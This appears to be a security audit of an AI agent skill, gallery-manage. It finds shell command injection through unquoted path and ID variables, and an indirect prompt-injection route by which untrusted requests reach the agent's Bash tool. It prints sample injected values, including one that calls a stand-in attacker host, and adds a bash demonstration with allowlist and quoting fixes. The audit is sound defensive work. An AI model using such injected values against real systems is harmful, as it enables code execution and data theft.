gallery-manage

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill is highly susceptible to shell command injection. User-controlled values such as $GALLERY_ID and $GALLERY_PATH are interpolated directly into shell commands (e.g., find $GALLERY_PATH/originals, cd $GALLERY_PATH/originals, and mkdir -p content/galleries/$GALLERY_ID) without quoting or validation.
    * Evidence: the 'Validate Gallery Images' and 'Organize Gallery' sections use unquoted variables in find and cd commands. Because the value is spliced into the command text before the shell parses it, an attacker who supplies a path such as 'img; curl attacker.com/$(whoami)' gets the trailing command executed, i.e. remote code execution.
  • [INDIRECT_PROMPT_INJECTION] (HIGH): This skill exposes a high-risk attack surface for indirect prompt injection.
    * Ingestion point: the skill accepts untrusted directory paths and IDs via its arguments.
    * Boundary markers: none; inputs are embedded directly into shell command text.
    * Capability inventory: the skill is allowed the Bash tool and performs file system operations (Write, Read, Glob).
    * Sanitization: none; nothing rejects directory traversal sequences (../) or shell metacharacters.
    If the agent acts on a request from an untrusted source to 'manage' a gallery, the attacker gains full control of the underlying shell environment.
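The following script is an added illustration, not code from the gallery-manage skill or from Gen Agent Trust Hub. It reproduces the finding above by splicing a hostile path into command text the way an agent would before handing it to a shell (simulated here with sh -c), and places the two controls the findings call for beside it: an allowlist check for the ID, canonicalization of the path under a fixed root, and single-quoting of any value that is pasted into a command. The function names (validate_gallery_id, resolve_under_root, shell_quote, unsafe_list_originals, safe_list_originals) and the temporary gallery the demo builds are assumptions of this example, not names from the skill.

```shell
#!/usr/bin/env bash
# Added example (not the gallery-manage skill's own code): the injection the
# audit describes, beside an allowlist check and quoting that close it.
set -euo pipefail

# Allowlist for gallery IDs used in paths such as content/galleries/$GALLERY_ID:
# letters, digits, '-' and '_', 1-64 chars. This rejects '..', '/', ';', '$',
# '(', whitespace and every other shell metacharacter by construction.
validate_gallery_id() {
  [ "${#1}" -ge 1 ] && [ "${#1}" -le 64 ] || return 1
  case "$1" in
    *[!A-Za-z0-9_-]*) return 1 ;;
  esac
  return 0
}

# Canonicalize a caller-supplied directory and require it to sit under ROOT.
# Prints the resolved (absolute) path; fails on traversal, symlink escape or
# a directory that does not exist.
resolve_under_root() {
  local root="$1" candidate="$2" real
  root=$(cd -- "$root" && pwd -P) || return 1
  real=$(cd -- "$candidate" 2>/dev/null && pwd -P) || return 1
  case "$real" in
    "$root"|"$root"/*) printf '%s\n' "$real" ;;
    *) return 1 ;;
  esac
}

# Single-quote a value so it is one literal word when pasted into command
# text (an embedded ' becomes '\''). An agent must do this before substituting
# a user value into a command template.
shell_quote() {
  printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# VULNERABLE: the skill's pattern as the audit describes it. The raw value is
# substituted into the command text before the shell parses it, so ';' and
# $(...) in the value run as commands. Errors from find are silenced so the
# injected command's output stands out.
unsafe_list_originals() {
  sh -c "find $1/originals -type f" 2>/dev/null || true
}

# HARDENED: the same listing. The path is canonicalized under ROOT first (so
# '../' and symlinks cannot escape) and then quoted as a single word. The
# resolved path is absolute, so it can never be read as a find option.
safe_list_originals() {
  local real
  real=$(resolve_under_root "$1" "$2") || return 1
  sh -c "find $(shell_quote "$real")/originals -type f"
}

# Demo on a constructed temporary gallery (sample data, not from the skill).
demo() {
  local root
  root=$(mktemp -d)
  mkdir -p "$root/summer-2024/originals"
  : > "$root/summer-2024/originals/IMG_0001.jpg"
  echo "unsafe: $(unsafe_list_originals 'x; echo INJECTED #')"
  echo "safe:   $(safe_list_originals "$root" "$root/summer-2024")"
  safe_list_originals "$root" 'x; echo INJECTED #' || echo "rejected hostile path"
  validate_gallery_id 'img; curl attacker.com/$(whoami)' || echo "rejected hostile id"
  rm -rf "$root"
}
demo
```

Quoting alone stops the metacharacter injection but not the traversal noted under Sanitization: a quoted '../../etc' is still a valid path for mkdir or cd, which is why the path is resolved against a root and the ID is allowlisted before either reaches a command.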
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 07:30 AM